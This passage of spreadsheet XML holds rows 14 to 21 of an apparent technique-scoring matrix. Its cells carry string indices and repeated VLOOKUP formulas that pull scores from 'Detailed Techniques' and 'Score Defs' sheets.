      <c r="K14" s="12" t="s">
        <v>123</v>
      </c>
      <c r="L14" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M14" s="12" t="s">
        <v>124</v>
      </c>
      <c r="N14" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O14" s="8" t="s">
        <v>125</v>
      </c>
      <c r="P14" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="Q14" s="3"/>
      <c r="R14" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="S14" s="12" t="s">
        <v>126</v>
      </c>
      <c r="T14" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="V14" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U14,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="15" spans="1:24" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A15" s="12" t="s">
        <v>98</v>
      </c>
      <c r="B15" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C15" s="12" t="s">
        <v>127</v>
      </c>
      <c r="D15" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E15" s="12" t="s">
        <v>128</v>
      </c>
      <c r="F15" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G15" s="12" t="s">
        <v>129</v>
      </c>
      <c r="H15" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I15" s="12" t="s">
        <v>130</v>
      </c>
      <c r="J15" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K15" s="12" t="s">
        <v>131</v>
      </c>
      <c r="L15" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M15" s="12" t="s">
        <v>132</v>
      </c>
      <c r="N15" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O15" s="3"/>
      <c r="P15" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="Q15" s="3"/>
      <c r="R15" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="S15" s="12" t="s">
        <v>133</v>
      </c>
      <c r="T15" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="V15" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U15,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="16" spans="1:24" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A16" s="12" t="s">
        <v>134</v>
      </c>
      <c r="B16" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C16" s="12" t="s">
        <v>135</v>
      </c>
      <c r="D16" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E16" s="12" t="s">
        <v>136</v>
      </c>
      <c r="F16" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G16" s="8" t="s">
        <v>137</v>
      </c>
      <c r="H16" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I16" s="12" t="s">
        <v>138</v>
      </c>
      <c r="J16" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K16" s="12" t="s">
        <v>139</v>
      </c>
      <c r="L16" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M16" s="12" t="s">
        <v>140</v>
      </c>
      <c r="N16" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O16" s="3"/>
      <c r="P16" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="Q16" s="3"/>
      <c r="R16" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="S16" s="12" t="s">
        <v>141</v>
      </c>
      <c r="T16" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="V16" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U16,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="17" spans="1:22" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A17" s="12" t="s">
        <v>142</v>
      </c>
      <c r="B17" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C17" s="12" t="s">
        <v>132</v>
      </c>
      <c r="D17" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E17" s="12" t="s">
        <v>143</v>
      </c>
      <c r="F17" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G17" s="8" t="s">
        <v>144</v>
      </c>
      <c r="H17" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I17" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J17" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K17" s="8" t="s">
        <v>146</v>
      </c>
      <c r="L17" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M17" s="12" t="s">
        <v>147</v>
      </c>
      <c r="N17" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O17" s="3"/>
      <c r="P17" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="Q17" s="3"/>
      <c r="R17" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="S17" s="12" t="s">
        <v>148</v>
      </c>
      <c r="T17" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="V17" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U17,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="18" spans="1:22" ht="17.649999999999999" x14ac:dyDescent="0.45">
      <c r="A18" s="12" t="s">
        <v>149</v>
      </c>
      <c r="B18" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C18" s="12" t="s">
        <v>132</v>
      </c>
      <c r="D18" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E18" s="12" t="s">
        <v>134</v>
      </c>
      <c r="F18" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G18" s="8" t="s">
        <v>150</v>
      </c>
      <c r="H18" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I18" s="12" t="s">
        <v>151</v>
      </c>
      <c r="J18" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K18" s="8" t="s">
        <v>152</v>
      </c>
      <c r="L18" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M18" s="12" t="s">
        <v>153</v>
      </c>
      <c r="N18" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O18" s="3"/>
      <c r="P18" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="Q18" s="3"/>
      <c r="R18" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="S18" s="12" t="s">
        <v>154</v>
      </c>
      <c r="T18" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="V18" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U18,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="19" spans="1:22" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A19" s="12" t="s">
        <v>105</v>
      </c>
      <c r="B19" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C19" s="12" t="s">
        <v>155</v>
      </c>
      <c r="D19" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E19" s="12" t="s">
        <v>156</v>
      </c>
      <c r="F19" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G19" s="8" t="s">
        <v>157</v>
      </c>
      <c r="H19" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I19" s="8" t="s">
        <v>158</v>
      </c>
      <c r="J19" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K19" s="8" t="s">
        <v>159</v>
      </c>
      <c r="L19" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="M19" s="12" t="s">
        <v>160</v>
      </c>
      <c r="N19" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O19" s="3"/>
      <c r="P19" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="Q19" s="3"/>
      <c r="R19" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="S19" s="8" t="s">
        <v>161</v>
      </c>
      <c r="T19" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="V19" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U19,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="20" spans="1:22" ht="17.649999999999999" x14ac:dyDescent="0.45">
      <c r="A20" s="12" t="s">
        <v>85</v>
      </c>
      <c r="B20" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C20" s="12" t="s">
        <v>162</v>
      </c>
      <c r="D20" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E20" s="12" t="s">
        <v>163</v>
      </c>
      <c r="F20" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G20" s="8" t="s">
        <v>164</v>
      </c>
      <c r="H20" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I20" s="8" t="s">
        <v>165</v>
      </c>
      <c r="J20" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="K20" s="3"/>
      <c r="L20" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="M20" s="12" t="s">
        <v>123</v>
      </c>
      <c r="N20" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(M20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(M20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="O20" s="3"/>
      <c r="P20" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(O20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(O20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="Q20" s="3"/>
      <c r="R20" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(Q20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(Q20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="S20" s="8" t="s">
        <v>166</v>
      </c>
      <c r="T20" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(S20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(S20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="V20" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U20,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="21" spans="1:22" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A21" s="12" t="s">
        <v>167</v>
      </c>
      <c r="B21" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C21" s="12" t="s">
        <v>168</v>
      </c>
      <c r="D21" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E21" s="12" t="s">
        <v>169</v>
      </c>
      <c r="F21" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G21" s="8" t="s">
        <v>170</v>
      </c>
      <c r="H21" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(G21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(G21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="I21" s="3"/>
      <c r="J21" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(I21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(I21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="K21" s="3"/>
      <c r="L21" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(K21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(K21,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="M21" s="12" t="s">
        <v>171</v>
      </c>
      <c r="N21" s="5">
